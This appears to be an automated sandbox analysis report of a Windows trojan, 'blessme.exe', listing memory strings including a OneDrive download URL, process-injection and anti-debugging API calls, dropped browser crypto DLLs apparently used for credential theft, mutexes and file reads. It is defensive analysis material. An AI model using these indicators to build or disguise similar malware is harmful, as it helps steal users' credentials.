            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authoriz
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000003.295661722.0000000000971000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
            Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: blessme.exe, 00000001.00000003.286406175.000000000090C000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21248&authkey=AKE-1uO
            Source: blessme.exe, 00000001.00000002.300607408.00000000008D7000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/y
            Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmp, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmp, blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/d
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/h
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png1
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/faviconsV
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/staticE
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: blessme.exe, 00000001.00000003.295638150.0000000000973000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l
            Source: blessme.exe, 00000001.00000002.305192139.000000001EBC0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=l?
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216176D NtWriteVirtualMemory,0_2_0216176D
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021604B1 EnumWindows,NtSetInformationThread,LoadLibraryA,0_2_021604B1
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021664CB NtProtectVirtualMemory,0_2_021664CB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216695D NtResumeThread,0_2_0216695D
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162A0A NtWriteVirtualMemory,0_2_02162A0A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166A0A NtResumeThread,0_2_02166A0A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162A36 NtWriteVirtualMemory,0_2_02162A36
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166A3B NtResumeThread,0_2_02166A3B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216222A NtWriteVirtualMemory,0_2_0216222A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166A67 NtResumeThread,0_2_02166A67
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162A94 NtWriteVirtualMemory,0_2_02162A94
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02165AB7 NtWriteVirtualMemory,0_2_02165AB7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162AFE NtWriteVirtualMemory,0_2_02162AFE
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166AE0 NtResumeThread,0_2_02166AE0
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02165B06 NtSetInformationThread,0_2_02165B06
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166B32 NtResumeThread,0_2_02166B32
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166B57 NtResumeThread,0_2_02166B57
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02164B58 NtWriteVirtualMemory,0_2_02164B58
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162768 NtWriteVirtualMemory,LoadLibraryA,0_2_02162768
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162B8E NtWriteVirtualMemory,0_2_02162B8E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166BCE NtResumeThread,0_2_02166BCE
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162BF3 NtWriteVirtualMemory,0_2_02162BF3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021627E3 NtWriteVirtualMemory,0_2_021627E3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162831 NtWriteVirtualMemory,0_2_02162831
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216183F NtWriteVirtualMemory,0_2_0216183F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166C24 NtResumeThread,0_2_02166C24
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162425 NtWriteVirtualMemory,0_2_02162425
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162C5E NtWriteVirtualMemory,0_2_02162C5E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166C4E NtResumeThread,0_2_02166C4E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216649C NtProtectVirtualMemory,0_2_0216649C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216288E NtWriteVirtualMemory,0_2_0216288E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166CA6 NtResumeThread,0_2_02166CA6
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021658A7 NtSetInformationThread,0_2_021658A7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166CD9 NtResumeThread,0_2_02166CD9
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021668C0 NtProtectVirtualMemory,0_2_021668C0
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021664C9 NtProtectVirtualMemory,0_2_021664C9
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021628EC NtWriteVirtualMemory,0_2_021628EC
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02160527 NtSetInformationThread,0_2_02160527
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216052B NtSetInformationThread,0_2_0216052B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162953 NtWriteVirtualMemory,0_2_02162953
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166D4F NtResumeThread,0_2_02166D4F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216057B NtSetInformationThread,0_2_0216057B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166963 NtResumeThread,0_2_02166963
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166989 NtResumeThread,0_2_02166989
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166DA7 NtResumeThread,0_2_02166DA7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021605DF NtSetInformationThread,0_2_021605DF
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021629C4 NtWriteVirtualMemory,0_2_021629C4
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021629FE NtWriteVirtualMemory,0_2_021629FE
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021669E3 NtResumeThread,0_2_021669E3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216176D NtWriteVirtualMemory,0_2_0216176D
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021604B1 EnumWindows,NtSetInformationThread,LoadLibraryA,0_2_021604B1
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021664CB NtProtectVirtualMemory,0_2_021664CB
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216695D NtResumeThread,0_2_0216695D
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162A0A NtWriteVirtualMemory,0_2_02162A0A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166A0A NtResumeThread,0_2_02166A0A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162A36 NtWriteVirtualMemory,0_2_02162A36
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166A3B NtResumeThread,0_2_02166A3B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216222A NtWriteVirtualMemory,0_2_0216222A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166A67 NtResumeThread,0_2_02166A67
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162A94 NtWriteVirtualMemory,0_2_02162A94
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02165AB7 NtWriteVirtualMemory,0_2_02165AB7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162AFE NtWriteVirtualMemory,0_2_02162AFE
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166AE0 NtResumeThread,0_2_02166AE0
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02165B06 NtSetInformationThread,0_2_02165B06
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166B32 NtResumeThread,0_2_02166B32
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166B57 NtResumeThread,0_2_02166B57
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02164B58 NtWriteVirtualMemory,0_2_02164B58
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162768 NtWriteVirtualMemory,LoadLibraryA,0_2_02162768
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162B8E NtWriteVirtualMemory,0_2_02162B8E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166BCE NtResumeThread,0_2_02166BCE
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162BF3 NtWriteVirtualMemory,0_2_02162BF3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021627E3 NtWriteVirtualMemory,0_2_021627E3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162831 NtWriteVirtualMemory,0_2_02162831
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216183F NtWriteVirtualMemory,0_2_0216183F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166C24 NtResumeThread,0_2_02166C24
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162425 NtWriteVirtualMemory,0_2_02162425
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162C5E NtWriteVirtualMemory,0_2_02162C5E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166C4E NtResumeThread,0_2_02166C4E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216649C NtProtectVirtualMemory,0_2_0216649C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216288E NtWriteVirtualMemory,0_2_0216288E
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166CA6 NtResumeThread,0_2_02166CA6
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021658A7 NtSetInformationThread,0_2_021658A7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166CD9 NtResumeThread,0_2_02166CD9
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021668C0 NtProtectVirtualMemory,0_2_021668C0
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021664C9 NtProtectVirtualMemory,0_2_021664C9
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021628EC NtWriteVirtualMemory,0_2_021628EC
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02160527 NtSetInformationThread,0_2_02160527
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216052B NtSetInformationThread,0_2_0216052B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02162953 NtWriteVirtualMemory,0_2_02162953
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166D4F NtResumeThread,0_2_02166D4F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0216057B NtSetInformationThread,0_2_0216057B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166963 NtResumeThread,0_2_02166963
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166989 NtResumeThread,0_2_02166989
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_02166DA7 NtResumeThread,0_2_02166DA7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021605DF NtSetInformationThread,0_2_021605DF
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021629C4 NtWriteVirtualMemory,0_2_021629C4
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021629FE NtWriteVirtualMemory,0_2_021629FE
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_021669E3 NtResumeThread,0_2_021669E3
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004032830_2_00403283
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034420_2_00403442
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004036420_2_00403642
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040340A0_2_0040340A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040341C0_2_0040341C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034320_2_00403432
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034C70_2_004034C7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034D50_2_004034D5
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034DD0_2_004034DD
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034900_2_00403490
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004035410_2_00403541
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040354A0_2_0040354A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004035230_2_00403523
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004035A40_2_004035A4
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004032830_2_00403283
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034420_2_00403442
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004036420_2_00403642
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040340A0_2_0040340A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040341C0_2_0040341C
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034320_2_00403432
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034C70_2_004034C7
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034D50_2_004034D5
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034DD0_2_004034DD
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004034900_2_00403490
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004035410_2_00403541
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_0040354A0_2_0040354A
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004035230_2_00403523
            Source: C:\Users\user\Desktop\blessme.exeCode function: 0_2_004035A40_2_004035A4
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_0009786F1_3_0009786F
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000A98771_3_000A9877
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_0009C0961_3_0009C096
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000821421_3_00082142
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000779A91_3_000779A9
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000772D41_3_000772D4
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_00076B561_3_00076B56
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000AAB761_3_000AAB76
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000985271_3_00098527
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000707BD1_3_000707BD
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000A739B1_3_000A739B
            Source: C:\Users\user\Desktop\blessme.exeCode function: 1_3_000A16AD1_3_000A16AD
            Source: blessme.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: blessme.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: blessme.exe, 00000000.00000002.249988232.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exeBinary or memory string: OriginalFilename vs blessme.exe
            Source: blessme.exe, 00000001.00000002.304127829.000000001E2D0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs blessme.exe
            Source: blessme.exe, 00000001.00000002.304127829.000000001E2D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs blessme.exe
            Source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000002.300411735.0000000000150000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs blessme.exe
            Source: blessme.exe, 00000001.00000002.303967664.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs blessme.exe
            Source: blessme.exe, 00000001.00000000.249182572.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exe, 00000001.00000002.303902579.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs blessme.exe
            Source: blessme.exeBinary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exe, 00000000.00000002.249988232.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exeBinary or memory string: OriginalFilename vs blessme.exe
            Source: blessme.exe, 00000001.00000002.304127829.000000001E2D0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs blessme.exe
            Source: blessme.exe, 00000001.00000002.304127829.000000001E2D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs blessme.exe
            Source: blessme.exe, 00000001.00000003.287861400.000000001F090000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289520141.000000001F08C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289575739.000000001E6BC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000003.294411349.000000001EDEC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000002.300411735.0000000000150000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs blessme.exe
            Source: blessme.exe, 00000001.00000003.289174749.000000001E6A4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs blessme.exe
            Source: blessme.exe, 00000001.00000002.305854343.000000001F110000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs blessme.exe
            Source: blessme.exe, 00000001.00000002.303967664.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs blessme.exe
            Source: blessme.exe, 00000001.00000000.249182572.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: blessme.exe, 00000001.00000002.303902579.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs blessme.exe
            Source: blessme.exeBinary or memory string: OriginalFilenameinfangt.exe vs blessme.exe
            Source: C:\Users\user\Desktop\blessme.exeSection loaded: crtdll.dllJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeSection loaded: crtdll.dllJump to behavior
            Source: blessme.exe, 00000001.00000003.300350315.00000000009A2000.00000004.00000001.sdmpBinary or memory string: ;.EXE;.BAT;.CMD;.VBS;.VBp4M>.
            Source: blessme.exe, 00000001.00000003.300350315.00000000009A2000.00000004.00000001.sdmpBinary or memory string: ;.EXE;.BAT;.CMD;.VBS;.VBp4M>.
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/49@3/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_01
            Source: C:\Users\user\Desktop\blessme.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-D3CBFD3E-5B364EF2
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_01
            Source: C:\Users\user\Desktop\blessme.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7566F0FB-D3CBFD3E-5B364EF2
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA461284CB6D9ECB5.TMPJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile created: C:\Users\user\AppData\Local\Temp\~DFA461284CB6D9ECB5.TMPJump to behavior
            Source: blessme.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: blessme.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\blessme.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\blessme.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: blessme.exe, 00000001.00000003.294955403.000000001EF34000.00000004.00000001.sdmp, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: blessme.exe, nss3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
